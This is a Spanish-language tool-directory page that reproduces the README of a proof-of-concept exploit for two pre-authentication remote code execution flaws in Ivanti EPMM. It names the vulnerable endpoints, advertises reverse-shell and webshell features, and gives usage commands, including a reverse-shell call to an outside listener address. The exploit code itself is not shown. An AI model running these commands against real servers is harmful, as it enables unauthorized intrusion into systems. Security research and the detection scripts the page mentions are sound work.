Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Prueba de concepto para CVE-2026-1281 y CVE-2026-1340 - RCE pre-autenticación en Ivanti EPMM mediante expansión aritmética de Bash | Kitploit
Herramientas/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Prueba de concepto para CVE-2026-1281 y CVE-2026-1340 - RCE pre-autenticación en Ivanti EPMM mediante expansión aritmética de Bash

Ver Repositorio
61hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-1281 y CVE-2026-1340 - Ivanti EPMM RCE Pre-Auth

License Python CVSS

⚠️ AVISO LEGAL: Este PoC se proporciona únicamente con fines educativos y de investigación en seguridad. Su uso sin autorización explícita es ilegal.

🎯 Descripción

Proof of Concept (PoC) completo para la explotación de las vulnerabilidades CVE-2026-1281 y CVE-2026-1340 que afectan a Ivanti Endpoint Manager Mobile (EPMM). Estas vulnerabilidades permiten la ejecución remota de código arbitrario (RCE) sin autenticación mediante un mecanismo de Bash Arithmetic Expansion.

Vulnerabilidades

  • CVE-2026-1281: Inyección de código en el endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340: Inyección de código en el endpoint
/mifs/c/aftstore/fob/
  • Puntuación CVSS: 9.8 (Crítica)
  • Explotación: Activa in-the-wild (Zero-Day)
  • 🚀 Características

    • ✅ Framework de validación automatizado (8 pruebas)
    • ✅ Explotación Pre-Auth RCE
    • ✅ Reverse shell automático
    • ✅ Despliegue de webshell
    • ✅ Más de 50 payloads listos para usar
    • ✅ Scripts de detección para Blue Team
    • ✅ Documentación completa

    📦 Instalación

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 Uso Rápido

    root@kitploit:~
    # Prueba de vulnerabilidad
    python3 exploit.py -t https://target.com -c
    
    # Validación RCE
    python3 exploit.py -t https://target.com --test-rce
    
    # Reverse shell
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 Documentación

    • README completo - Documentación técnica detallada
    • Guía de uso - Guía paso a paso
    • Payloads - Colección de más de 50 payloads
    • Guía Red Team - Escenarios operativos

    🔗 Referencias

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 Autor

    Mehdi Le Deaut - Consultor de Ciberseguridad | Especialista en Red Team

    LinkedIn

    ⚖️ Licencia

    Este proyecto está bajo licencia MIT - consulte el archivo LICENSE para más detalles.

    🙏 Agradecimientos

    • CERT-FR por la alerta rápida
    • Watchtowr Labs por el análisis técnico
    • La comunidad de ciberseguridad
    Descargar herramienta